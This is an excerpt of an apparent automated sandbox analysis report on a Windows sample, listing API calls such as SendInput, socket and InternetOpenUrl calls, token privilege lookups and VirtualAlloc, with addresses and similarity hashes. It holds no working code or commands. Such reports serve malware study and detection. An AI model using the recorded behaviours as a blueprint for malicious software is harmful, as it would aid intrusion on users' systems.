                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Window$Long
                    • String ID: SysTreeView32
                    • API String ID: 847901565-1698111956
                    • Opcode ID: c7e55cbd6a8a657843da32079134ce1d461160bffebd5df77aea92cf724c902a
                    • Instruction ID: 9e4785eb384bff08fe91b9afb672897396f9529e8aebd581ab54159f52d1fb78
                    • Opcode Fuzzy Hash: c7e55cbd6a8a657843da32079134ce1d461160bffebd5df77aea92cf724c902a
                    • Instruction Fuzzy Hash: 3C319D31214205AEDB158F34CC45BEA7BB9EB05324F244726F879922E0E739E851DB60
                    APIs
                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 007D76D0
                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 007D76E4
                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 007D7708
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: MessageSend$Window
                    • String ID: SysMonthCal32
                    • API String ID: 2326795674-1439706946
                    • Opcode ID: 92ba4da05dac3fac9c0a14111213faefabd7df14b37c6bde2e5cf5af05af87a7
                    • Instruction ID: 5298da26359d121f2123e188d024345ff63defb3dd582fcdb4e7a9e68ab885a3
                    • Opcode Fuzzy Hash: 92ba4da05dac3fac9c0a14111213faefabd7df14b37c6bde2e5cf5af05af87a7
                    • Instruction Fuzzy Hash: BB219132500219ABDF158E54CC46FEA3B79EF48724F110215FE156B2D0E6B9E850DBA0
                    APIs
                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 007D6FAA
                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 007D6FBA
                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 007D6FDF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: MessageSend$MoveWindow
                    • String ID: Listbox
                    • API String ID: 3315199576-2633736733
                    • Opcode ID: 78f3882e556fdf22f920527a326b2863738e4ebd5319fc40c641f95fd00ccc2c
                    • Instruction ID: ff88a553464d4c7dbc7d0a954099f50e8efaee0fc2125caf2ae0a9bb314728a7
                    • Opcode Fuzzy Hash: 78f3882e556fdf22f920527a326b2863738e4ebd5319fc40c641f95fd00ccc2c
                    • Instruction Fuzzy Hash: 68219232611118BFDF118F54DC85FEB37BAEF89764F018125F9159B290CA75AC518BA0
                    APIs
                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 007D79E1
                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 007D79F6
                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 007D7A03
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID: msctls_trackbar32
                    • API String ID: 3850602802-1010561917
                    • Opcode ID: d4d7e263e5b277207d8cdd9b2ab20fac06c6481dce8d7e3ec9a1337719f1104b
                    • Instruction ID: f03b2a935c6e0fdd74f331594ac4f9b2d6015331c0292b8c92d985282f31ae25
                    • Opcode Fuzzy Hash: d4d7e263e5b277207d8cdd9b2ab20fac06c6481dce8d7e3ec9a1337719f1104b
                    • Instruction Fuzzy Hash: 19110132240208BAEF149F64CC05FEB37B9EF89764F02461AFA41A61D0E275A811CB60
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00754C2E), ref: 00754CA3
                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00754CB5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetNativeSystemInfo$kernel32.dll
                    • API String ID: 2574300362-192647395
                    • Opcode ID: 809736893b40b4e8be8544095975403ce19cb8c9118844299ca10b76235fef0a
                    • Instruction ID: 36668b9b2676f1cccad7ca896742404833973a4629a1891f1c2ca8a2ff72d83f
                    • Opcode Fuzzy Hash: 809736893b40b4e8be8544095975403ce19cb8c9118844299ca10b76235fef0a
                    • Instruction Fuzzy Hash: 8BD017B0512727CFD7209F31DA18A4676F6AF06796B15C83BD897D6250E7B8D8C0CA60
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00754D2E,?,00754F4F,?,008162F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00754D6F
                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00754D81
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                    • API String ID: 2574300362-3689287502
                    • Opcode ID: 7f30638b5fcd913f65abd8880d0a0fbe5b4f324662a7013167dab65bce9a44f6
                    • Instruction ID: 21d64c27b12581d715dde38f10ea1138e3a6647057782164c2c31e4d1a906146
                    • Opcode Fuzzy Hash: 7f30638b5fcd913f65abd8880d0a0fbe5b4f324662a7013167dab65bce9a44f6
                    • Instruction Fuzzy Hash: 74D08271A00B13CFE7208F30C80824272F8AF00352B10C83AD893C2290E6BCD8808A60
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00754CE1,?), ref: 00754DA2
                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00754DB4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                    • API String ID: 2574300362-1355242751
                    • Opcode ID: f2fa2ad26d2a1dffec4d81c410250f902727418ee4305378705b7fa4fafaabc4
                    • Instruction ID: c98f3dd0c29209613b0c738a07357ce739e21b7e0fbfb0a59d8acb09b829550c
                    • Opcode Fuzzy Hash: f2fa2ad26d2a1dffec4d81c410250f902727418ee4305378705b7fa4fafaabc4
                    • Instruction Fuzzy Hash: EED01771A51B13DFD7209F31D808A8676F5AF0535AB15C83BD8D6D6290E7BCD8C0CA60
                    APIs
                    • LoadLibraryA.KERNEL32(advapi32.dll,?,007D12C1), ref: 007D1080
                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 007D1092
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: RegDeleteKeyExW$advapi32.dll
                    • API String ID: 2574300362-4033151799
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,00000001,007C9009,?,007DF910), ref: 007C9403
                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 007C9415
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetModuleHandleExW$kernel32.dll
                    • API String ID: 2574300362-199464113
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: LocalTime__swprintf
                    • String ID: %.3d$WIN_XPe
                    • API String ID: 2070861257-2409531811
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    APIs
                    • CharLowerBuffW.USER32(?,?), ref: 007CE3D2
                    • CharLowerBuffW.USER32(?,?), ref: 007CE415
                      • Part of subcall function 007CDAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 007CDAD9
                    • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 007CE615
                    • _memmove.LIBCMT ref: 007CE628
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: BuffCharLower$AllocVirtual_memmove
                    • String ID:
                    • API String ID: 3659485706-0
                    APIs
                    • CoInitialize.OLE32(00000000), ref: 007C83D8
                    • CoUninitialize.OLE32 ref: 007C83E3
                      • Part of subcall function 007ADA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 007ADAC5
                    • VariantInit.OLEAUT32(?), ref: 007C83EE
                    • VariantClear.OLEAUT32(?), ref: 007C86BF
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                    • String ID:
                    • API String ID: 780911581-0
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Variant$AllocClearCopyInitString
                    • String ID:
                    • API String ID: 2808897238-0
                    APIs
                    • GetWindowRect.USER32(011EECC8,?), ref: 007D9AD2
                    • ScreenToClient.USER32(00000002,00000002), ref: 007D9B05
                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 007D9B72
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Window$ClientMoveRectScreen
                    • String ID:
                    • API String ID: 3880355969-0
                    APIs
                    • socket.WSOCK32(00000002,00000002,00000011), ref: 007C6CE4
                    • WSAGetLastError.WSOCK32(00000000), ref: 007C6CF4
                      • Part of subcall function 00759997: __itow.LIBCMT ref: 007599C2
                      • Part of subcall function 00759997: __swprintf.LIBCMT ref: 00759A0C
                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 007C6D58
                    • WSAGetLastError.WSOCK32(00000000), ref: 007C6D64
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ErrorLast$__itow__swprintfsocket
                    • String ID:
                    • API String ID: 2214342067-0
                    APIs
                    • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,007DF910), ref: 007C67BA
                    • _strlen.LIBCMT ref: 007C67EC
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: _strlen
                    • String ID:
                    • API String ID: 4218353326-0
                    APIs
                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 007BBB09
                    • GetLastError.KERNEL32(?,00000000), ref: 007BBB2F
                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 007BBB54
                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 007BBB80
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: CreateHardLink$DeleteErrorFileLast
                    • String ID:
                    • API String ID: 3321077145-0
                    APIs
                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007D8B4D
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: InvalidateRect
                    • String ID:
                    • API String ID: 634782764-0
                    APIs
                    • ClientToScreen.USER32(?,?), ref: 007DAE1A
                    • GetWindowRect.USER32(?,?), ref: 007DAE90
                    • PtInRect.USER32(?,?,007DC304), ref: 007DAEA0
                    • MessageBeep.USER32(00000000), ref: 007DAF11
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Rect$BeepClientMessageScreenWindow
                    • String ID:
                    • API String ID: 1352109105-0
                    APIs
                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 007B1037
                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 007B1053
                    • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 007B10B9
                    • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 007B110B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: KeyboardState$InputMessagePostSend
                    • String ID:
                    • API String ID: 432972143-0
                    APIs
                    • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 007B1176
                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 007B1192
                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 007B11F1
                    • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 007B1243
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: KeyboardState$InputMessagePostSend
                    • String ID:
                    • API String ID: 432972143-0
                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0078644B
                    • __isleadbyte_l.LIBCMT ref: 00786479
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 007864A7
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 007864DD
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                    • String ID:
                    • API String ID: 3058430110-0
                    APIs
                    • GetForegroundWindow.USER32 ref: 007D5189
                      • Part of subcall function 007B387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 007B3897
                      • Part of subcall function 007B387D: GetCurrentThreadId.KERNEL32 ref: 007B389E
                      • Part of subcall function 007B387D: AttachThreadInput.USER32(00000000,?,007B52A7), ref: 007B38A5
                    • GetCaretPos.USER32(?), ref: 007D519A
                    • ClientToScreen.USER32(00000000,?), ref: 007D51D5
                    • GetForegroundWindow.USER32 ref: 007D51DB
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                    • String ID:
                    • API String ID: 2759813231-0
                    APIs
                      • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
                    • GetCursorPos.USER32(?), ref: 007DC7C2
                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0078BBFB,?,?,?,?,?), ref: 007DC7D7
                    • GetCursorPos.USER32(?), ref: 007DC824
                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0078BBFB,?,?,?), ref: 007DC85E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                    • String ID:
                    • API String ID: 2864067406-0
                    • Opcode ID: 6932b289cc2efdc15d531688da6272236f4abade2383d6e30c901b16efb5b8cd
                    • Instruction ID: 3e15fb40baebcffc30920b6ca75b808c8575c0e2805524fc4966dcb3e39f3a22
                    • Opcode Fuzzy Hash: 6932b289cc2efdc15d531688da6272236f4abade2383d6e30c901b16efb5b8cd
                    • Instruction Fuzzy Hash: 1931A835600018EFCB16CF98D898EEA7BBAFF49310F04416AF9468B261D7395D61EF60
                    APIs
                    • __setmode.LIBCMT ref: 00770BF2
                      • Part of subcall function 00755B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,007B7B20,?,?,00000000), ref: 00755B8C
                      • Part of subcall function 00755B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,007B7B20,?,?,00000000,?,?), ref: 00755BB0
                    • _fprintf.LIBCMT ref: 00770C29
                    • OutputDebugStringW.KERNEL32(?), ref: 007A6331
                      • Part of subcall function 00774CDA: _flsall.LIBCMT ref: 00774CF3
                    • __setmode.LIBCMT ref: 00770C5E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                    • String ID:
                    • API String ID: 521402451-0
                    • Opcode ID: 3f07b1ca3471a318cb9e9ca8cdb7eb52cb9e84d4a83776725daaba5a16dff701
                    • Instruction ID: 5e9efb24b8272fe94738c64dd1c0947a65318d33796acfb796978e9fe7651024
                    • Opcode Fuzzy Hash: 3f07b1ca3471a318cb9e9ca8cdb7eb52cb9e84d4a83776725daaba5a16dff701
                    • Instruction Fuzzy Hash: B7112432A04208EACF05B3B89C4B9FE7B6D9F45360F14815AF20857192DF6D2D9687E5
                    APIs
                      • Part of subcall function 007A8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 007A8669
                      • Part of subcall function 007A8652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 007A8673
                      • Part of subcall function 007A8652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007A8682
                      • Part of subcall function 007A8652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 007A8689
                      • Part of subcall function 007A8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007A869F
                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 007A8BEB
                    • _memcmp.LIBCMT ref: 007A8C0E
                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007A8C44
                    • HeapFree.KERNEL32(00000000), ref: 007A8C4B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                    • String ID:
                    • API String ID: 1592001646-0
                    • Opcode ID: 438b20641aaab932d97a4b679df1a9edb2c8e6c166588ae74b108a4f6dc51164
                    • Instruction ID: ff57969cfdde1334147c28c7e7c1c024bf31b285eebd5801d27a1bad98d5a1f6
                    • Opcode Fuzzy Hash: 438b20641aaab932d97a4b679df1a9edb2c8e6c166588ae74b108a4f6dc51164
                    • Instruction Fuzzy Hash: 26219F71D02208EFDB04DF94C944BEEB7B8EF81351F048199E455A7241DB39AE05CF61
                    APIs
                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007C1A97
                      • Part of subcall function 007C1B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 007C1B40
                      • Part of subcall function 007C1B21: InternetCloseHandle.WININET(00000000), ref: 007C1BDD
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Internet$CloseConnectHandleOpen
                    • String ID:
                    • API String ID: 1463438336-0
                    • Opcode ID: 5b2f448c5e6f2fce67a127b17e10655644abf39a0430c52b0af842e4bf44e176
                    • Instruction ID: a4c872dfc5be27c899c343778edb948085190a3a30d8e6bc605cbbd5fff12530
                    • Opcode Fuzzy Hash: 5b2f448c5e6f2fce67a127b17e10655644abf39a0430c52b0af842e4bf44e176
                    • Instruction Fuzzy Hash: 5321D171201600BFDB129F608C04FBBB7BDFF45710F54402EFA0696652EB39E8219BA4
                    APIs
                      • Part of subcall function 007AF5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,007AE1C4,?,?,?,007AEFB7,00000000,000000EF,00000119,?,?), ref: 007AF5BC
                      • Part of subcall function 007AF5AD: lstrcpyW.KERNEL32(00000000,?), ref: 007AF5E2
                      • Part of subcall function 007AF5AD: lstrcmpiW.KERNEL32(00000000,?,007AE1C4,?,?,?,007AEFB7,00000000,000000EF,00000119,?,?), ref: 007AF613
                    • lstrlenW.KERNEL32(?,00000002,?,?,?,?,007AEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 007AE1DD
                    • lstrcpyW.KERNEL32(00000000,?), ref: 007AE203
                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,007AEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 007AE237
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
